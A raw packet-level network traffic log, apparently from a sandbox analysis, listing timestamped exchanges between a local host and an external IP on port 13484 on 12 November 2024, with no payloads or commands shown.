Nov 12, 2024 18:45:30.412044048 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412061930 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412091970 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412111044 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412121058 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412157059 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412188053 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412198067 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412209988 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412240982 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412269115 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412273884 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412288904 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412297964 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412327051 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412344933 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412377119 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412386894 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412395000 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412404060 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412422895 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412446022 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412452936 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412456989 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412493944 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412511110 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412520885 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412537098 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412547112 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412580013 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412607908 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412667036 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412683964 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412697077 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412705898 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412723064 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412740946 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412750959 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412755966 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412765980 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412774086 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412798882 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412801981 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412808895 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412817955 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412830114 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412830114 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412847042 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412868977 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412878990 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412889004 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412898064 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412925005 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412934065 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412935019 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412954092 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412978888 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.412983894 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.412993908 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413026094 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413048029 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413058043 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413120031 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413125038 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413131952 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413161039 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413161993 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413172960 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413183928 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413201094 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413217068 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413227081 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413237095 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413248062 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413256884 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413283110 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413296938 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413306952 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413311005 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413345098 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413410902 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413439035 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413448095 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413456917 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413463116 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413469076 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413477898 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413506985 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413528919 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413530111 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413539886 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413579941 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413618088 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413628101 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413635969 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413650036 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413661957 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413671970 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413700104 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413708925 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413711071 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413729906 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413737059 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413739920 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.413755894 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.413785934 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414097071 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414108038 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414117098 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414125919 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414134979 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414144039 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414151907 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414154053 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414155960 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414160967 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414165974 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414169073 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414172888 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414176941 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414180040 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414181948 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414186001 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414205074 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414216042 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414226055 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414242029 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414251089 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414258957 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414293051 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414295912 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414314032 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414326906 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414335012 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414352894 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414356947 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414403915 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414460897 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414469957 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414510012 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414556026 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414566040 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414613008 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414647102 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414654970 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414664030 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414671898 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414697886 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414727926 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414732933 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414736986 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414782047 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414793968 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414834976 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414887905 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414896965 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414905071 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414928913 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414943933 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414966106 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.414983034 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414990902 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.414998055 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415034056 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415050030 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415077925 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415105104 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415113926 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415122032 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415146112 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415160894 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415188074 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415198088 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415235043 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415236950 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415268898 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415277958 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415277958 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415287971 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415326118 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415328979 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415338993 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415347099 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415366888 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415374994 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415376902 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415379047 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415421009 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415421963 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415432930 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415469885 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415479898 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415481091 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415524960 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415525913 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415569067 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415580034 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415580034 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415590048 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415612936 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415621042 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415632963 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415668964 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.415787935 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.415843010 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417417049 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417435884 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417483091 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417490959 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417500973 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417510033 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417520046 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417538881 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417547941 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417557955 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417561054 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417608023 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417610884 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417628050 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417643070 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417680025 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417695045 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417714119 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417726040 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417742014 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417767048 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417778015 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417790890 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417800903 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417839050 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417850018 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417859077 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417881966 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417896032 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417900085 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417907000 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417917013 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.417929888 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.417954922 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.422382116 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422391891 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422419071 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.422447920 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.422589064 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422626972 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422674894 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.422729969 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422739983 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422749996 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422780037 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.422795057 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422797918 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.422807932 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422852039 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.422879934 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422888994 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422897100 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422929049 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.422960043 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.422961950 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422972918 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422981977 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.422991037 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423001051 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423008919 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423012972 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.423027039 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.423058987 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.423343897 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423353910 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423362970 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423378944 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423403978 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.423408031 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423417091 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423425913 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423428059 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.423449039 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.423471928 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.423667908 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423679113 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423687935 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423697948 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423707962 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423717022 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423724890 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.423727036 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423737049 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423747063 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423755884 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423760891 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.423765898 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423774958 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423782110 CET	49779	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:30.423784971 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423794985 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423803091 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423811913 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423820972 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423830032 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423839092 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423847914 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423856974 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423866034 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423875093 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423883915 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423893929 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423904896 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423916101 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423923969 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423933029 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423943043 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423952103 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423960924 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423969984 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423979044 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423988104 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.423996925 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424005032 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424012899 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424021959 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424031019 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424040079 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424050093 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424057961 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424076080 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424084902 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424093962 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424104929 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424113035 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424122095 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424129963 CET	13484	49779	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:30.424139023 CET	13484	49779	193.70.111.186	192.168.2.7
